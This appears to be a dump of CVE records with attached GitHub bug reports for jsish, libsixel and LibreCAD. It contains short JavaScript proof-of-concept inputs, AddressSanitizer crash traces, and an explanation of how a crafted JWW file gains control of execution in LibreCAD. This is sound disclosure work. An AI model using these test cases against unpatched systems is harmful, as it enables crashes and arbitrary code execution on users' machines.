heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete Shadow bytes around the buggy address: 0x0c0c7fff9b90: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff9ba0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff9bb0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9bc0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9bd0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff9be0: 00 00 00 fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c0c7fff9bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete
https://api.github.com/repos/pcmacdon/jsish/issues/61/comments
0
2021-12-24T10:30:42Z
2022-01-12T02:13:11Z
https://github.com/pcmacdon/jsish/issues/61
1,088,302,674
61
3,091
CVE-2021-46481
2022-01-25T01:15:08.010
Jsish v3.5.0 was discovered to contain a memory leak via linenoise at src/linenoise.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/55" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/pcmacdon/jsish/issues/55
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var JSEtest = [ 'aa', 'bb', 'hhh' ]; try { Number.bind(console.input('listNum' + JSEtest), 4)(); } catch (e) {}; try { (1 >> y).toFixed.bind(2, 4)(); } catch (e) {}; (1 >> y).toFixed.bind(2, 4)(); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js listNum [object Object] /home/user/poc.js:10: error: apply Number.toFixed to a non-number object ERROR: ================================================================= ERROR: LeakSanitizer: detected memory leaks Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7f0e5412d538 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x77538) #1 0x56523c6594ad in linenoise src/linenoise.c:1061 SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s). ``` Credits: Found by OWL337 team.
Memory leaks in linenoise src/linenoise.c:1061
https://api.github.com/repos/pcmacdon/jsish/issues/55/comments
0
2021-12-24T09:44:48Z
2022-01-12T02:11:57Z
https://github.com/pcmacdon/jsish/issues/55
1,088,278,241
55
3,092
CVE-2021-46482
2022-01-25T01:15:08.050
Jsish v3.5.0 was discovered to contain a heap buffer overflow via NumberConstructor at src/jsiNumber.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/66" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/66" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/66
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript var a = [ [0] ]; var actual = (Number).bind("abcdab", [ [0] ].indexOf("abcdab", 99))(); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018b40 at pc 0x55803d35220a bp 0x7fff119980c0 sp 0x7fff119980b0 WRITE of size 4 at 0x604000018b40 thread T0 #0 0x55803d352209 in NumberConstructor src/jsiNumber.c:93 #1 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55803d2a2fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55803d2a2fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55803d31ead6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55803d5ef71a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55803d5ef71a in jsiEvalFunction src/jsiEval.c:837 #8 0x55803d5ef71a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55803d60315e in jsi_evalcode src/jsiEval.c:2204 #10 0x55803d607274 in jsi_evalStrFile src/jsiEval.c:2665 #11 0x55803d2f666a in Jsi_Main src/jsiInterp.c:936 #12 0x55803dafb03a in jsi_main src/main.c:47 #13 0x7ff56e70cbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #14 0x55803d28a969 in _start (/usr/local/bin/jsish+0xe8969) 0x604000018b40 is located 1 bytes to the right of 47-byte region [0x604000018b10,0x604000018b3f) allocated by thread T0 here: #0 0x7ff56f37bd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55803d2fbaa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor Shadow bytes around the buggy address: 0x0c087fffb110: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00 0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb140: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 07 0x0c087fffb150: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa =>0x0c087fffb160: fa fa 00 00 00 00 00 07[fa]fa 00 00 00 00 00 00 0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb190: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor
https://api.github.com/repos/pcmacdon/jsish/issues/66/comments
0
2021-12-24T10:35:07Z
2022-01-12T02:14:08Z
https://github.com/pcmacdon/jsish/issues/66
1,088,304,812
66
3,093
CVE-2021-46483
2022-01-25T01:15:08.090
Jsish v3.5.0 was discovered to contain a heap buffer overflow via BooleanConstructor at src/jsiBool.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/62" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/62
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest(val) { Boolean.bind(a)(); if (val < 3) return true; else return false; } var arr = new Array(10); arr[1] = 1; Array.prototype.unshift(arr.every(JSEtest), true, 'test'); ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000188c0 at pc 0x55dff29d9510 bp 0x7ffc8e20b280 sp 0x7ffc8e20b270 WRITE of size 4 at 0x6040000188c0 thread T0 #0 0x55dff29d950f in BooleanConstructor src/jsiBool.c:17 #1 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55dff29a8ad6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837 #8 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204 #10 0x55dff29b0834 in jsi_FuncCallSub src/jsiProto.c:220 #11 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777 #12 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789 #13 0x55dff29f3f64 in jsi_ArrayFindSubCmd src/jsiArray.c:576 #14 0x55dff29f3f64 in jsi_ArrayEveryCmd src/jsiArray.c:663 #15 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244 #16 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796 #17 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837 #18 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264 #19 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204 #20 0x55dff2c91274 in jsi_evalStrFile src/jsiEval.c:2665 #21 0x55dff298066a in Jsi_Main src/jsiInterp.c:936 #22 0x55dff318503a in jsi_main src/main.c:47 #23 0x7fb189dc7bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #24 0x55dff2914969 in _start (/usr/local/bin/jsish+0xe8969) 0x6040000188c0 is located 6 bytes to the right of 42-byte region [0x604000018890,0x6040000188ba) allocated by thread T0 here: #0 0x7fb18aa36d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55dff2985aa4 in Jsi_Calloc src/jsiUtils.c:57 SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor Shadow bytes around the buggy address: 0x0c087fffb0c0: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 00 00 0x0c087fffb0d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fffb0e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fffb0f0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb100: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa =>0x0c087fffb110: fa fa 00 00 00 00 00 02[fa]fa 00 00 00 00 00 00 0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb140: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb150: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb160: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor
https://api.github.com/repos/pcmacdon/jsish/issues/62/comments
0
2021-12-24T10:31:27Z
2022-01-12T02:13:25Z
https://github.com/pcmacdon/jsish/issues/62
1,088,303,083
62
3,094
CVE-2021-45340
2022-01-25T12:15:07.643
In Libsixel prior to and including v1.10.3, a NULL pointer dereference in the stb_image.h component of libsixel allows attackers to cause a denial of service (DOS) via a crafted PICT file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libsixel/libsixel/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libsixel/libsixel/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:*:*:*:*:*:*:*:*", "matchCriteriaId": "F4049A12-67EA-4961-9B1A-331D52D04E8D", "versionEndExcluding": null, "versionEndIncluding": "1.10.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libsixel/libsixel/issues/51
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libsixel", "libsixel" ]
This is a duplicate report of issue [160](https://github.com/saitoha/libsixel/issues/160) in the original project. I'm not sure where best to report this, but it affects both projects. ## Vulnerable versions * saitoha/libsixel at the latest (6a5be8b72d84037b83a5ea838e17bcf372ab1d5f) commit * libsixel/libsixel at the latest (bc93c8ce570b35b8f3bb429ea5892ac260e4c8b1) commit ## Steps to reproduce `img2sixel stbio_1561_poc.bin` Input file (a malformed PICT-format image) is [attached](https://github.com/libsixel/libsixel/files/7715065/stbi_1561_poc.zip) ## Cause Segmentation fault in `stbi__convert_format` at `stb_image.h:1561`: ```c switch (STBI__COMBO(img_n, req_comp)) { /* ... */ STBI__CASE(4,3) { dest[0]=src[0],dest[1]=src[1],dest[2]=src[2]; } break; /* ... */ } ``` The `src` pointer is `NULL`, as passed in from `stbi__pic_load`. The source of the NULL pointer is the malloc at line `6120`: ```c result = (stbi_uc *) stbi__malloc_mad4(x, y, 4, 0); ``` whose output is never checked for `NULL`. The x and y dimensions (39168, 5888) are read directly from the input file, and they pass the check in `stbi__mad3sizes_valid` which only checks for integer overflow. The total size of the allocated buffer is `39168 * 5888 * 4` and allocation fails. ## Impact Denial of service is the only obvious impact. ## Mitigation `stb_image` starting at version 2.27 (commit 50072f66589f52f51eb5b3f56b9272ea8ec1fdac) include a check for this condition. libsixel should be brought up-to-date with this version if possible. If not, backport [the check](https://github.com/nothings/stb/blob/af1a5bc352164740c1cc1354942b1c6b72eacb8a/stb_image.h#L6448) as well as similar error checks for other malloc calls.
NULL pointer dereference in stb_image.h
https://api.github.com/repos/libsixel/libsixel/issues/51/comments
9
2021-12-14T22:08:42Z
2025-02-12T00:02:11Z
https://github.com/libsixel/libsixel/issues/51
1,080,342,756
51
3,095
CVE-2021-45341
2022-01-25T12:15:07.693
A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1462" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreCAD/LibreCAD/issues/1462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5077" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:librecad:librecad:*:*:*:*:*:*:*:*", "matchCriteriaId": "952DEFEE-00FC-4BBC-8305-8611255AF7C3", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "84591147-6A0D-4F5C-91F3-51DF9F64FCF5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "6B9DD625-CB16-4904-A4B0-7BA57A49531C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "79099DF5-DD78-4B2F-9B4A-A7FECBAF2AC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/LibreCAD/LibreCAD/issues/1462
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreCAD", "LibreCAD" ]
### Vulnerable Products * LibreCAD 2.2.0-rc3 and older * Jw_cad 8.24a and older ### Steps to reproduce or sample file 1. Start LibreCAD 2.2.0-rc3 in a debugger 2. File/Open... 3. Unzip and open the attached [proof of concept file](https://github.com/LibreCAD/LibreCAD/files/7739792/jww_cdatamoji.zip) 4. Observe `ACCESS_VIOLATION` crash, with `eip=0x41414141` (AAAA) Screenshot: ![x32dbg showing librecad.exe executing at 0x41414141](https://user-images.githubusercontent.com/158607/146652800-e1dfc005-d502-45f9-98e8-bfe09e5ca73b.png) ### Cause The `CDataMoji` entity deserialization at `LibreCAD/libraries/jwwlib/src/jwwdoc.h` is vulnerable to a stack buffer overflow. `char buf[512]` declared in `CDataMoji::Serialize()` on [line 512](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L512) is of fixed size 512. Some varieties of `CDataMoji` provide their own size, e.g. MojiData2 on [line 523](https://github.com/LibreCAD/LibreCAD/blob/768285653c46e734a75460928142cda1a33c2c53/libraries/jwwlib/src/jwwdoc.h#L523) and no bounds checking is performed. This allows an attacker to overflow `buf` and overwrite other stack variables, including the return address. The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present in older versions and on other platforms. ### Impact An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user. ### Proposed Mitigation 1. Perform bounds checking in `CDataMoji::Serialize()`, and refuse to load the file if it would overflow `buf`. 2. Enable stack smashing protection in the windows build of LibreCAD. ### Operating System and LibreCAD version info Version: 2.2.0-rc3 Compiler: GNU GCC 7.3.0 Compiled on: Nov 29 2021 Qt Version: 5.12.4 Boost Version: 1.65.1 System: 